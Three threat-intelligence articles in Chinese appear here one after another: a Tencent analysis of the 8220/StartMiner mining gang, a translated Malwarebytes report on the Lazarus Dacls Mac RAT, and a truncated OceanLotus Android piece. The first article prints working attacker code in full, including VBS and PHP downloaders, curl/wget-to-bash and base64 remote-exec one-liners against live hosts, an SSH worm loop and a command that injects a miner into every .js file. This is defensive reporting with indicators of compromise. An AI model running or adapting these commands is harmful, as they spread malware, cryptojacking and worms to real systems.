Struts远程命令执行漏洞、Redis未授权访问漏洞入侵的相关协议特征进行识别检测; 关于T-Sec高级威胁检测系统的更多信息,可参考: https://cloud.tencent.com/product/nta 腾讯T-Sec终端安全管理系统(御点) 1)可查杀8220挖矿木马团伙入侵释放的后门木马程序、挖矿木马程序; 2)企业终端管理系统已支持检测黑产利用Apache Struts远程命令执行漏洞、Redis未授权访问漏洞入侵相关的网络通信。 腾讯御点提供企业终端的防毒杀毒、防入侵、漏洞管理、基线管理等能力,关于T-Sec终端安全管理系统的更多资料,可参考:https://s.tencent.com/product/yd/index.html 更多产品信息,请参考腾讯安全官方网站https://s.tencent.com/ 三、利用Struts漏洞(CVE-2017-5638)入侵服务器挖矿 Apache Struts是一款用于创建企业级Java Web应用的开源框架,Struts2存在远程代码执行的严重漏洞(漏洞编号S2-045,CVE编号:CVE-2017-5638),并定级为高风险,影响版本范围为Struts 2.3.5 – Struts 2.3.31和Struts 2.5 – Struts 2.5.10。 该漏洞能允许黑客远程代码执行,相当于整台服务器已托管给黑客,黑客可以利用此漏洞获取web应用的源程序,修改web应用内容,获取数据库密码并盗取数据库信息,更改系统代码,更改数据库密码等等。 黑客批量扫描Web服务器并针对存在CVE-2017-5638漏洞的机器进行攻击,然后通过shell写入VBS脚本文件app.vbs并启动运行。 c:\windows\temp\app.vbs代码内容如下: Set Post = CreateObject(“Msxml2.XMLHTTP”) Set Shell = CreateObject(“Wscript.Shell”) Post.Open “GET”,”http://www.jukesxdbrxd.xyz/steamhuby.exe”,0 Post.Send() Set aGet = CreateObject(“ADODB.Stream”) aGet.Mode = 3 aGet.Type = 1 aGet.Open() aGet.Write(Post.responseBody) aGet.SaveToFile “C:/Windows/temp/steamhuby.exe”,2 wscript.sleep 10000 Shell.Run (“C:/Windows/temp/steamhuby.exe”) Set Post = CreateObject(“Msxml2.XMLHTTP”) Set Shell = CreateObject(“Wscript.Shell”) Post.Open “GET”,”http://104.244.75.25/steamhuby.exe”,0 Post.Send() Set aGet = CreateObject(“ADODB.Stream”) aGet.Mode = 3 aGet.Type = 1 aGet.Open() aGet.Write(Post.responseBody) aGet.SaveToFile ” C:/Windows/temp/steamhuby.exe”,2 wscript.sleep 10000 Shell.Run (” C:/Windows/temp/steamhuby.exe”) Set Post = CreateObject(“Msxml2.XMLHTTP”) Set Shell = CreateObject(“Wscript.Shell”) Post.Open “GET”,”http://104.244.75.25/kmkww.exe”,0 Post.Send() Set aGet = CreateObject(“ADODB.Stream”) aGet.Mode = 3 aGet.Type = 1 aGet.Open() aGet.Write(Post.responseBody) aGet.SaveToFile ” C:/Windows/temp/kmkww.exe”,2 wscript.sleep 10000 Shell.Run (” C:/Windows/temp/kmkww.exe”) app.vbs下载得到挖矿木马母体steamhuby.exe,该样本拷贝自身到C:\ProgramData\guvpgnkpwv\steamhuby.exe,然后访问下载解密的更新配置文件url,将挖矿配置文件信息cfg、cfgi释放到该文件夹下。 该钱包目前在公开矿池pool.hashvault.pro挖矿获得30个XMR,但是由于其使用多个私有矿池挖矿,实际收益会远大于这个数目。 漏洞攻击时利用Shell执行的另一段VBS代码apps.vbs下载的挖矿木马为ww.exe,存放至C:/Windows/temp/12.exe或C:/Windows/temp/13.exe,并直接传入挖矿参数开启挖矿。 c:\windows\temp\apps.vbs内容如下: Set Post = CreateObject(“Msxml2.XMLHTTP”) Set Shell = CreateObject(“Wscript.Shell”) Post.Open “GET”,”http://jukesbrxd.xyz/ww.exe”,0 Post.Send() Set aGet = CreateObject(“ADODB.Stream”) aGet.Mode = 3 aGet.Type = 1 aGet.Open() aGet.Write(Post.responseBody) aGet.SaveToFile “C:/Windows/temp/12.exe”,2 wscript.sleep 10000 Shell.Run (“C:/Windows/temp/13.exe –donate-level=1 -k -o 37.59.162.30:5790 -u 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ -p x -B”) 四、爆破攻击Tomcat服务器挖矿 该团伙利用漏洞攻击成功后,会向目标服务器植入多款挖矿木马进行门罗币挖矿。 Tomcat 是由 Apache 开发的一个 Servlet 容器,实现了对 Servlet 和 JSP 的支持,并提供了作为Web服务器的一些特有功能,如Tomcat管理和控制平台、安全域管理和Tomcat阀等, /manager/html为tomcat自带管理功能后台,如果密码强度不高,容易被黑客破解入侵。 黑客针对Tomcat服务器进行扫描和暴力破解,然后将保存在FTP服务器上的PHP木马和VM木马下载到失陷机器,利用php木马继续下载挖矿木马。 Win.php 通过system执行cmd命令,利用certutil.exe下载ww.exe,存放至c:\windows\temp\kkw2.exe,传入参数开启挖矿:–donate-level=1 -k –max-cpu-usage 100 -o 23.94.24.12:8080 -u 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ -p x -B 创建脚本kkmw.txt、kksw.txt,利用ftp命令从服务器ftp[:]//107.189.11.170下载kmkww.exe、ww.exe,传入挖矿参数启动挖矿; 创建下载脚本poc.vbs,并写入以下代码,下载ww.exe并启动挖矿: Set objXMLHTTP=CreateObject(“MSXML2.XMLHTTP”) objXMLHTTP.open “GET”,”http://107.189.11.170/ww.exe”,false objXMLHTTP.send() If objXMLHTTP.Status=200 Then Set objADOStream=CreateObject(“ADODB.Stream”) objADOStream.Open objADOStream.Type=1 objADOStream.Write objXMLHTTP.ResponseBody objADOStream.Position=0 objADOStream.SaveToFile “C:\Windows\Temp\mess.exe” objADOStream.Close Set objADOStream=NothingEnd if Set objXMLHTTP=Nothing Set objShell=CreateObject(“WScript.Shell”) objShell.Exec(“C:\Windows\Temp\mess.exe –donate-level 1 -o 23.94.24.12:8080 -u 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ -p x -B”) 通过Powershell命令下载和执行3.ps1、2.ps1。 创建poc2.vbs,写入与poc.vbs类似的下载代码,下载kmkww.exe启动挖矿。 Linx.php 修改DNS服务器为8.8.8.8 安装Linux下载工具: apt-get install wget -y; yum install wget -y; apt-get install curl -y; yum install curl -y; 利用多个下载工具下载bash脚本2start.jpg并执行,运行后rm -rf删除文件: get -q -O – http://107.189.11.170/2start.jpg | bash -sh; url -fsSL http://107.189.11.170/2start.jpg | bash -sh; wget -q -O – http://107.189.11.170/2start.jpg | bash -sh; curl -fsSL http://107.189.11.170/2start.jpg | bash -sh; cur -fsSL http://107.189.11.170/2start.jpg | bash -sh; lwp-download http://107.189.11.170/2start.jpg /tmp/2start.jpg; bash /tmp/2start.jpg; rm -rf 2start.jpg; 解码base64编码的python脚本并运行,最后history -c删除记录。 Base64: cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xMDcuMTg5LjExLjE3MC9hLnB5IikucmVhZCgpKSc= 解码: python -c ‘import urllib;exec(urllib.urlopen(“http://107.189.11.170/a.py”).read())’ Base64: cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xMDcuMTg5LjExLjE3MC9iLnB5IikucmVhZCgpKSc= 解码: python -c ‘import urllib;exec(urllib.urlopen(“http://107.189.11.170/b.py”).read())’ Powershell 木马攻击Windows系统使用的3.ps1具有以下功能: 下载ww32.exe、kkw2.exe并保存至temp目录。 找到进程可能是其他挖矿木马的端口连接,杀死对应进程 将Powershell脚本why.ps1、why4.ps1安装为计划任务 “Update service for Oracle productsm”,并删除旧的计划任务。 匹配文件名,退出杀软进程和竞品挖矿木马进程,包括ddg.exe,然后启动自己的挖矿进程kkw2.exe。 Python 攻击Linux系统使用的linx.php会执行Python脚本a.py,该脚本负责下载32位、64位Linux系统版本挖矿木马i686、x86_64,并通过命令chomd设置读、写、运行三种权限,然后运行挖矿。 i686、x86_64是由XMRig程序编译的Linux版本挖矿木马 五、组建Tsunami僵尸网络进行DDoS攻击 b.py则下载32位、64位基于Linux系统的Tsunami(海啸)僵尸网络木马x64b、x32b。 Tsunami会利用远程代码执行漏洞,扫描、定位和攻击脆弱的系统,攻击成功会会导致僵尸网络完全控制设备。Tsunami通过IRC协议与C2服务器通信,接收指令并发起HTTP、UDP类型的DDoS攻击。 六、横向移动 利用Redis未授权访问漏洞 木马用于扫描攻击的ss2.py、ss3.py经过base64编码,解码后的内容都是下载new.py执行。 new.py首先生成待攻击的IP列表IP_LIST,其中方法一位获取本机IP的A段和B段,然后依次遍历0~256,1~256组成C段和D段;方法二为随机生成10万个IP,排除内网IP地址;最后把两种方法生成的IP合并到同一个列表得到约16万个IP。 对每个IP进行6379端口(Redis服务)探测连接,如果端口开放,继续判断是否存在Redis未授权访问漏洞。 Redis在默认情况下,会绑定在0.0.0.0:6379。如果没有采取相关的安全策略会使Redis服务完全暴露在公网上。如果在没有设置密码认证(一般为空)的情况下,攻击者可以在未授权访问Redis的情况下,利用Redis自身的提供的config命令,进行文件的读写等操作,包括将自己的ssh公钥写入到目标服务器的 /root/.ssh文件夹下的authotrized_keys文件中,进而可以使用对应的私钥直接使用ssh服务登录目标服务器。 如果被扫描IP存在Redis未授权访问漏洞,通过命令将curl、wget下载执行恶意脚本hehe.sh的代码写入crontab定时任务(写入“/var/spool/cron”、“/var/spool/cron/crontabs”),每1分钟执行一次。 curl -fsSLk -max -time 40 http[:]//jukesxdbrxd.xyz/hehe.sh -o ~/.ntp || wget –quiet –no-check-certificate –timeout=40 http[:]//jukesxdbrxd.xyz/hehe.sh -o ~/.ntp SSH连接 hehe.sh继续通过基于公钥认证的SSH攻击其他机器,从/.ssh/known_hosts中获取已认证的远程主机ID,与对应的机器建立SSH连接并执行命令下载恶意脚本hehe.sh: if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then   for h in $(grep -oE “\b([0-9]{1,3}\.){3}[0-9]{1,3}\b” /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h ‘(curl -fsSL http://www.jukesxdbrxd.xyz/hehe.sh||wget -q -O- http://www.jukesxdbrxd.xyz/hehe.sh)|bash >/dev/null 2>&1 &’ & done fi for file in /home/* do     if test -d $file     then         if [ -f $file/.ssh/known_hosts ] && [ -f $file/.ssh/id_rsa.pub ]; then             for h in $(grep -oE “\b([0-9]{1,3}\.){3}[0-9]{1,3}\b” $file/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h ‘(curl -fsSL http://www.jukesxdbrxd.xyz/hehe.sh||wget -q -O- http://www.jukesxdbrxd.xyz/hehe.sh)|bash >/dev/null 2>&1 &’ & done         fi     fi done hehe.sh还会通过crontab定时任务设置持久化,定期下载自身运行。 执行base64编码的Python脚本,重新获取Python攻击代码new.py(由ss2.py、ss3.py下载)并发起新的攻击。 I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cDovL3d3dy5qdWtlc3hkYnJ4ZC54eXovc3MzLnB5Jwp0cnk6CiAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliLnVybG9wZW4oZCkucmVhZCgpKQogICAgZXhlYyhwYWdlKQpleGNlcHQ6CiAgICBwYXNz 解码: #coding: utf-8 import urllib import base64 d= ‘http://www.jukesxdbrxd.xyz/ss3.py’ try:     page=base64.b64decode(urllib.urlopen(d).read())     exec(page) except:     pass 挖矿木马植入 hehe.sh还会查找“.js”文件并在其中插入js挖矿木马http[:]//t.cn/EvlonFh(长链接对应https[:]//xmr.omine.org/assets/v7.js) 插入命令: find / -name ‘*.js’|xargs grep -L f4ce9|xargs sed -i ‘$a\document.write\(‘\’\<script\ src=\”http://t.cn/EvlonFh\”\>\</script\>\<script\>OMINEId\(\”61adfe72ae314d8f86532b3cd1c60bda\”,\”-1\”\)\</script\>\’\)\; js挖矿木马所属网站: 最后下载负责运行Linux平台ELF挖矿木马的shell脚本2start.jpg、3start.jpg: if [ $? -eq 0 ] then pwd else curl -s http://www.jukesxdbrxd.xyz/3start.jpg | bash -sh wget -q -O – http://www.jukesxdbrxd.xyz/3start.jpg | bash -sh url -s http://www.jukesxdbrxd.xyz/3start.jpg | bash -sh get -q -O – http://www.jukesxdbrxd.xyz/3start.jpg | bash -sh curl -s http://www.jukesxdbrxd.xyz/2start.jpg | bash -sh wget -q -O – http://www.jukesxdbrxd.xyz/2start.jpg | bash -sh url -s http://www.jukesxdbrxd.xyz/2start.jpg | bash -sh get -q -O – http://www.jukesxdbrxd.xyz/2start.jpg | bash -sh fi 2start.jpg或3start.jpg判断Linux挖矿木马kworkerdss是否存在 不存在则下载挖矿程序x、xx,以及挖矿配置文件wt.conf。 七、关联家族分析 1.代码相似性 我们取被友商划归为8220挖矿木马的Powershell脚本1.ps1与近期被友商命名为StartMiner的Powershell脚本3.ps1进行对比: 1.ps1  afd9911c85a034902cf8cca3854d4a23 (下载地址:http[:]//192.99.142.248:8220/1.ps1) 3.ps1  faf53676fa29216c14d3698ff44893c8(下载地址:http[:]//www.jukesxdbrxd.xyz/3.ps1) (注:根据木马下载核心shell脚本使用的地址http[:]//www.jukesxdbrxd.xyz/3start.jpg,www[.]jukesxdbrxd.xyz应属于StartMiner) 8220挖矿木马使用的1.ps1的主要有4个功能: 1、下载挖矿木马 2、安装计划任务执行Powershell脚本(持久化),清除旧的计划任务 3、杀死竞品挖矿木马 4、启动挖矿木马 StartMiner使用的3.ps1功能与上述1.ps1完全一致,只是在下载挖矿木马时同时下载了两个文件,因此在启动挖矿进程时也启动相应的两个,增加了通过联网端口匹配竞品挖矿进程,对清除竞品挖矿木马的文件名单进行了补充。 两者相同的清除计划任务名单: “Update service for Oracle products” “Update service for Oracle products5” “Update service for Oracle products1” “Update service for Oracle products2” “Update service for Oracle products3” “Update service for Oracle products4” “Update service for Oracle products7” “Update service for Oracle products8” “Update service for Oracle products0” “Update service for Oracle products9” “Update service for Oracle productsa” “Update service for Oracle productsc” “Update service for Oracle productsm” 两者相同的清除竞品挖矿木马进程名单: ddg.exe yam.exe miner.exe xmrig.exe nscpucnminer32.exe 1e.exe iie.exe 3.exe iee.exe ie.exe je.exe im360sd.exe iexplorer.exe imzhudongfangyu.exe 360tray.exe 360rp.exe 360rps.exe pe.exe me.exe 2.共同的C2 37.44.212.223,作为8220挖矿木马C2:http[:]//37.44.212.223/rig,作为StartMiner C2:http[:]//37.44.212.223/x 3.门罗币钱包 “8220”挖矿木马与StartMiner挖矿木马都使用了门罗币钱包: 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ StartMiner: 由steamhuby.exe(8780219e4a6eb4bd1b618aee4167be5a)释放出挖矿配置文件cfg “8220”挖矿木马:由antspywares.exe(4b5df24b5deda127966029ce0fd83897)释放出配置文件cfg 并且steamhuby.exe和antspywares.exe解密挖矿配置文件时创建相同的互斥量“4e064bee1f3860fd606a”,使用相同的密钥:”0125789244697858″。 4. FTP服务器 都使用FTP服务器提供木马下载服务。 8220挖矿木马:ftp[:]//93.174.93.149 StartMiner:ftp[:]//107.189.11.170 基于上述特点我们认为2020年初开始出现的StartMiner与2017年被曝光的“8220”挖矿木马属于同一团伙,而该团伙在近期攻击过程中已不再具有明显的“8220”端口使用的特征。近期攻击过程中偏好使用的文件名如下: PE文件: isassx.exe、steamhuby.exe、kmkww.exe、haha.exe、hue.exe、xmrig1.exe、ww.exe、ww32.exe、x.jpeg、issaasss、xmrig.exe、ww2.exe、isasss.exe、ready.exe、oity.exe、kkw2.exe、12.exe、13.exe、mess.exe ELF文件: x86_64、i686、x64b、x32b、hxx、xx、x、1.so、Kworkerdss Linux Shell脚本: 2start.jpg、3start.jpg、response.jpeg、it.sh、go、go4、go3、hehe.sh、xdd.sh、start.sh Powershell脚本: 2.ps1、3.ps1、why.ps1、why2.ps1、why3.ps1、kkmswx.ps1 Python脚本: a.py、b.py、ss2.py、ss3.py、new.py VBS脚本: app.vbs、apps.vbs、poc.vbs PHP文件: linx.php、win.php VM文件(类似于JSP): linx.vm、win,vm、win2.vm txt文件: kmkww.txt、xmr.txt、config.txt、kkmw.txt、kksw.txt IOCS Domain jukesbrxd.xyz www.jukesxdbrxd.xyz IP 107.189.11.170 104.244.75.25 23.94.24.12 104.244.74.248 37.44.212.223 URL http[:]//jukesbrxd.xyz/isassx.exe http[:]//jukesbrxd.xyz/ww.exe http[:]//www.jukesxdbrxd.xyz/steamhuby.exe http[:]//www.jukesxdbrxd.xyz/new.py http[:]//www.jukesxdbrxd.xyz/xmr.txt http[:]//jukesxdbrxd.xyz/hehe.sh http[:]//104.244.75.25/steamhuby.exe http[:]//104.244.75.25/kmkww.exe http[:]//104.244.75.25/i686 http[:]//37.44.212.223/haha.exe http[:]//37.44.212.223/hue.exe http[:]//37.44.212.223/xmrig1.exe http[:]//37.44.212.223/xdxd.txt http[:]//107.189.11.170/a.py http[:]//107.189.11.170/b.py http[:]//107.189.11.170/3.ps1 ftp[:]//107.189.11.170/kmkww.exe ftp[:]//107.189.11.170/linx.php ftp[:]//107.189.11.170/linx.vm ftp[:]//107.189.11.170/win.php ftp[:]//107.189.11.170/win.vm ftp[:]//107.189.11.170/win2.vm ftp[:]//107.189.11.170/ww.exe http[:]//107.189.11.170/x64b http[:]//107.189.11.170/x32b http[:]//185.153.180.59/isassx.exe http[:]//104.244.74.248/x86_64 http[:]//23.94.24.12/kmkww.txt MD5 MD5 病毒名 8780219e4a6eb4bd1b618aee4167be5a Win32.Trojan.Inject.Auto 3c27fc39cccfdca4c38735ba6676364c Win32.Trojan.Inject.Auto ce854dd32e1d931cd6a791b30dcd9458 Win32.Trojan.Inject.Auto 64cb1856e9698cf0457a90c07a188169 Linux.Trojan.Shell.Loni c0ab986107d80f4ddbfdb46d3426244a Linux.Trojan.Shell.Djeg 46aeb7070c73c6f66171c0f86baf9433 Win32.Risk.Bitcoinminer.Pdwo a5c7c93fa57c1fc27cde28b047c85be6 Linux.Trojan.Bitcoinminer.Lnxv afd9911c85a034902cf8cca3854d4a23 Win32.Trojan.Generic.Lscf faf53676fa29216c14d3698ff44893c8 Win32.Trojan.Agent.Auto 3d99bd4a5916308685ab16ed64265b41 Linux.Trojan.Python.Dqdx 15e503acfa91f74b7a3de96cede5bde5 Linux.Trojan.Python.Hzqc 9fe932ac3055045a46d44997a4c6d481 Linux.Trojan.Miner.Rusg c4d44eed4916675dd408ff0b3562fb1f Linux.Backdoor.Tsunami.Ejrw ee48aa6068988649e41febfa0e3b2169 Linux.Backdoor.Tsunami.Amce d4ae941c505ee53e344fb4d4c2e102b7 Win32.Trojan.Miner.Buox c915dee2be8d698a02125caf8e0e938e Linux.Exploit.Redisattack.Kiqf 1e715be740f9f484c67d50f4f5b04d95 Linux.Exploit.Redisattack.Aqmo 25b8710947639ee3572c70f49eb3a207 Win32.Trojan-downloader.Miner.Hrzc e3e156053ef2ea06ae6c7dccba4ad7bc Linux.Backdoor.Phpshell.Gnnv c28cd1fd309d31d2db9a4776651bed4d Linux.Backdoor.Phpshell.Psdk d875b62187076116b9818249d57d565f Linux.Trojan.Miner.Uqid 矿池: 37.59.162.30:5790 23.94.24.12:8080 pool.hashvault.pro:80 钱包: 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ 参考链接: 新型IoT/Linux恶意软件针对DVR攻击组成僵尸网络 https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/ 疑似国内来源的“8220挖矿团伙”追踪溯源分析 https://mp.weixin.qq.com/s/oUV6iDvIrsoiQztjNVCDIA “8220团伙”最新活动分析:挖矿木马与勒索病毒共舞 https://mp.weixin.qq.com/s/CPHRAntQAflcJr_BcNnNUg 8220团伙新动向:利用Aapche Struts高危漏洞入侵,Windows、Linux双平台挖矿 https://mp.weixin.qq.com/s/sO8sXWKVWCHS6upVc_6UtQ 抗“疫”时期,谨防服务器被StartMiner趁机挖矿! https://mp.weixin.qq.com/s/4350pUlXYXTMyYEAzztwQQ

通过 Trojanized 2FA 应用程序散播 Lazarus Dacls RAT 的 Mac 新变种木马

有关研究团队最新发现了一种新的Dacls远程访问特洛伊木马(RAT)变种,它与朝鲜的Lazarus集团有关联,并且专门为Mac操作系统设计。 Dacls是2019年12月奇虎360 NetLab发现的一种针对Windows和Linux平台的全功能隐蔽远程访问特洛伊木马(RAT)。 这个Mac变种至少通过一个名为MinaOTP的木马化的macOS二元身份验证应用程序进行分发,该应用程序主要由中国用户使用。与Linux变种类似,它拥有多种功能,包括命令执行、文件管理、流量代理和蠕虫扫描。 发现 4月8日,一个名为“TiNakOTP”的可疑Mac应用程序从香港提交到VirusTotal,当时没有任何引擎检测到它。 恶意的bot可执行文件位于应用程序的“Contents/Resources/Base.lproj/”目录中,当它是Mac可执行文件时,它会伪装成nib文件(“SubMenu.nib”)。它包含字符串“c_2910.cls”和“k_3872.cls”,而这是以前检测到的证书和私钥文件的名称。 持久性 该RAT通过LaunchDaemons或LaunchAgents持久存在,它们采用属性列表(plist)文件,这个文件指定了重启后需要执行的应用程序。LaunchAgents和LaunchDaemons之间的区别在于,LaunchAgents代表登录用户运行代码,而LaunchDaemons以root用户运行代码。“ 当恶意应用程序启动时,它将在“Library/LaunchDaemons”目录下创建一个名称为“com.aex-loop.agent.plist”的plist文件,plist文件的内容在应用程序中进行了硬编码。 该程序还会检查“getpwuid( getuid() )”是否返回当前进程的用户ID。如果返回用户ID,它将在LaunchAgents目录“Library/LaunchAgents/”下创建plist文件“com.aex-loop.agent.plist”。 图1 plist文件 存储plist的文件名和目录为十六进制格式并附加在一起,它们向后显示文件名和目录。 图2 目录和文件名生成 配置文件 配置文件包含有关受害者计算机的信息,例如Puid、Pwuid、插件和C&C服务器,配置文件的内容使用AES加密算法进行加密。 图3 加载配置 Mac和Linux变种都使用相同的AES密钥和IV来加密和解密配置文件,两种变种中的AES模式均为CBC。 图4 AES密钥和IV 配置文件的位置和名称以十六进制格式存储在代码中,该配置文件名称伪装成与Apple Store相关的数据库文件:“Library/Caches/Com.apple.appstore.db”。 图5 配置文件名 “IntializeConfiguration”功能使用以下硬编码的C&C服务器初始化配置文件。 图6 初始化配置文件 通过从C&C服务器接收命令来不断更新配置文件。安装后的应用程序名称为“mina”。Mina来自MinaOTP应用程序,它是针对macOS的双因素身份验证应用程序。 图7 配置文件正在更新 主循环 初始化配置文件后,执行主循环以执行以下四个主命令: 将C&C服务器信息从配置文件上载到服务器(0x601) 从服务器下载配置文件内容并更新配置文件(0x602) 通过调用“getbasicinfo”函数(0x700)从受害者的计算机上传收集的信息 发送heartbeat信息(0x900) 命令代码与Linux.dacls完全相同。 图8 主循环 插件 此Mac-RAT拥有Linux变种中的所有六个插件,以及一个名为“SOCKS”的附加插件。这个新插件用于代理从受害者到C&C服务器的网络流量。 该应用程序会在主循环开始时加载所有七个插件。每个插件在配置文件中都有自己的配置部分,将在插件初始化时加载。 图9 加载的插件 CMD插件 cmd插件类似于Linux rat中的“bash”插件,它通过为C&C服务器提供一个反向shell来接收和执行命令。 图10 CMD插件 文件插件 文件插件具有读取、删除、下载和搜索目录中文件的功能。Mac和Linux变种之间的唯一区别是Mac变种不具有写入文件的能力(case 0)。 图11 文件插件 进程插件 进程插件具有终止、运行、获取进程ID和收集进程信息的功能。 图12 进程插件 如果可以访问进程的“ / proc /%d / task”目录,则插件将从进程获取以下信息,其中%d是进程ID: 通过执行“/ proc /%/ cmdline”获取进程的命令行参数 “/ proc /%d / status”文件中进程的名称、Uid、Gid、PPid 测试插件 Mac和Linux变种之间的测试插件的代码是相同的,它检查到C&C服务器指定的IP和端口的连接。 RP2P插件 RP2P插件是一个代理服务器,用于避免受害者与参与者的基础设施进行直接通信。 图13 反向P2P LogSend插件 Logsend插件包含三个模块: 检查与日志服务器的连接 扫描网络(蠕虫扫描仪模块) 执行长期运行的系统命令 图14 Logsend插件 该插件使用HTTP端口请求发送收集的日志。 图15 用户代理 这个插件中一个有趣的功能是蠕虫扫描程序。“start_worm_scan”可以扫描端口8291或8292上的网络子网,要扫描的子网是基于一组预定义规则确定的。下图显示了选择要扫描的子网的过程。 图16 蠕虫扫描 Socks插件 Socks插件是此Mac Rat中新增的第七个插件,它类似于RP2P插件,并充当引导bot和C&C基础结构之间通信的媒介,它使用Socks4进行代理通信。 图17 Socks4 网络通讯 此Mac-RAT使用的C&C通信与Linux变种类似,为了连接到服务器,应用程序首先建立一个TLS连接,然后执行beaconing操作,最后使用RC4算法对通过SSL发送的数据进行加密。 图18 应用程序生成的流量(.mina) 图19 TLS连接 Mac和Linux变种都使用WolfSSL库进行SSL通信,WolfSSL通过C中的TLS的开源实现,支持多个平台。这个库已被多个威胁参与者使用,例如,Tropic Trooper在其Keyboys恶意软件中使用了这个库。 图20 WolfSSL 用于beaconing的命令代码与Linux.dacls中使用的代码相同,这是为了确认bot和服务器的身份。 图21 Beaconing RC4密钥是通过使用硬编码密钥生成的。 图22 RC4初始化 变体和检测 我们还确定了此RAT的另一个变体,该变体使用以下curl命令下载恶意负载:curl -k -o〜/ Library / .mina https://loneeaglerecords.com/wpcontent/uploads/2020/01/images.tgz.001>/ dev / null 2>&1 && chmod + x〜/ Library / .mina> /dev / null 2>&1 &&〜/ Library / .mina> / dev。 我们认为,Dcals RAT的Mac变体与Lazarus小组(也称为Hidden Cobra和APT 38)有关,Lazarus小组是自2009年以来一直从事网络间谍活动和网络犯罪的臭名昭著的朝鲜恐怖组织。 据悉,该组织是最成熟的参与者之一,能够针对不同平台定制恶意软件。这个Mac-RAT的发现表明,APT小组正在不断开发其恶意软件工具集。 Mac的Malwarebytes将该远程管理木马检测为OSX-DaclsRAT。 IOCs 899e66ede95686a06394f707dd09b7c29af68f95d22136f0a023bfd01390ad53 846d8647d27a0d729df40b13a644f3bffdc95f6d0e600f2195c85628d59f1dc6 216a83e54cac48a75b7e071d0262d98739c840fd8cd6d0b48a9c166b69acd57d d3235a29d254d0b73ff8b5445c962cd3b841f487469d60a02819c0eb347111dd d3235a29d254d0b73ff8b5445c962cd3b841f487469d60a02819c0eb347111dd   loneeaglerecords[.]com/wp-content/uploads/2020/01/images.tgz.001 67.43.239.146 185.62.58.207 50.87.144.227   消息来源:malwarebytes, 译者:dengdeng。 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

海莲花(OceanLotus) APT组织滥用合法证书传播高级 Android 威胁

2014年以来,海莲花(OceanLotus)APT组织(或被称为PhantomLance)就以通过官方和第三方市场传播高级Android威胁而闻名。他们试图远程控制受感染的设备、窃取机密数据、安装应用程序并启动任意代码。 安全研究人员最近记录了该组织的活动,Bitdefender调查发现了该组织35个新的恶意样本,并证明其活动可能使用了合法且可能被盗的数字证书来对某些样本进行签名。 该APT组织的作案手法是先上传干净版本,然后添加恶意软件,然后通过Google Play和第三方市场传播恶意Android应用。 安全研究人员认为,海莲花APT组织与Android恶意软件和过去基于Windows的高级威胁的命令和控制域之间的共享基础结构相关联,这些威胁过去一直以Microsoft用户为目标。可以说,这些较早的活动也与Hacking Team组织有联系,该组曾为APT32组织服务。 虽然海莲花主要针对非洲和亚洲,但Bitdefender遥测技术还可以在日本、韩国、越南、德国和印度等国家进行扫描。 Bitdefender 检测到此威胁为  Android.Trojan.OceanLotus。 寻找“零号病人” 在Bitdefender存储库(APK MD5:315f8e3da94920248676b095786e26ad)中找到的,与海莲花APT组织所关联的最古老的样本似乎已于2014年4月首次登陆Google Play 。可追溯到最早的已知Google Play样本在2014年12月。 根据内部zip文件时间戳记,该样本构建于2014年4月5日,几天后就被我们记录下。 一个有趣的发现是,该样本已使用VL Corporation的证书进行了签名。 该证书于2013年7月生成,并且直到2014年为止,除OceanLotus Malware以外,Google Play上已有100多个不同的应用程序在使用它。这表明网络犯罪集团可能已使用有效证书成功地将恶意病毒app走私到了Google Play中。 Certificate:      Data:          Version: 3 (0x2)          Serial Number: 2002933886 (0x7762587e)          Signature Algorithm: sha256WithRSAEncryption          Issuer: C=VN, ST=10000, L=HN, O=VL Corporation, OU=VL Corporation, CN=VL Corporation          Validity              Not Before: Jul 22 18:57:09 2013 GMT              Not After : Jul 16 18:57:09 2038 GMT          Subject: C=VN, ST=10000, L=HN, O=VL Corporation, OU=VL Corporation, CN=VL Corporation 他的证书很可能已被该APT组织泄漏和滥用。目前,在Google Play中使用此证书签名的100多个应用程序中,仍然没有该应用程序。 目标国家 在遥测方面,仅在过去的3个月中,我们就收到25篇涉及此威胁的报告,其中大多数是在美国、日本和韩国。显然,在美国的报告可能不是真实的设备,但亚马逊托管的Android计算机被操纵来运行样本以进行安全分析,对于安全研究人员而言,执行这种沙箱操作并不少见,特别是在尝试获取危害指标或研究恶意行为时。 但是,韩国和日本的报告确实表明,最近遇到过海莲花APT样本的设备至少数量有限。 Android OceanLotus报告威胁的十大国家 追踪传播 在传播方面,虽然安全研究人员已经报告说恶意软件的发行是通过官方的Google Play市场和第三方市场进行的,但一些与Google Play相似的市场仍在托管这些样本。这意味着,尽管Google在及时管理其应用程序并响应安全研究人员和供应商方面做得很出色,但第三方市场(如果有的话)缓慢地消除了这些威胁,甚至有可能无限期地使用户暴露于恶意软件中。 仍托管这些恶意样本的第三方市场的一些样本包括: hxxps://apkpure.com/opengl-plugin/net.vilakeyice.openglplugin 